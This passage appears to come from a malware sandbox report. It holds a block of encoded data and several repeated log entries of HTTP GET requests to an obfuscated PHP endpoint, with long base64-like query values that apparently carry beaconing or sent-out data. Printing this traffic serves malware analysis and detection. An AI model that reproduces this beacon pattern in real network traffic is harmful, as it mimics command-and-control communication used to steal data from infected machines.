a0sWS2kUeNdXWy4UaOJTW3NGROpXSqpVMV1mW0EERalmV610dRdlT5VERPVTQq1EeNJTWsJkaOp3Yq5Ua3lWSPpUaPlWUt1EaOdUTzk1Rah3a6lVenpXW310VOdXTH9EakpWT6tmaa1mU650MVdlTwUFVPpmTqlVaGpWSzlUaUl2bqlUMJRkWs5kMZlXUU1EaGRlTykkMNp3YU9EeZpnT1kUbOJTWq5EaadkW1kFVa1mWt5EaoRlW4l0QMlGNrlkNJNkTpRGValmTXpFeNdlT6lFRNNTUX9EeN1WW0k1RaBTWqpleFpXTspEVOh3Yq5EenpmW0MGRPl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaj1mYwJEWaxGeyUVavpWS6ZFSkhmUzUVNShVYyw2RkpmRrl0cJlmYxoEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3F
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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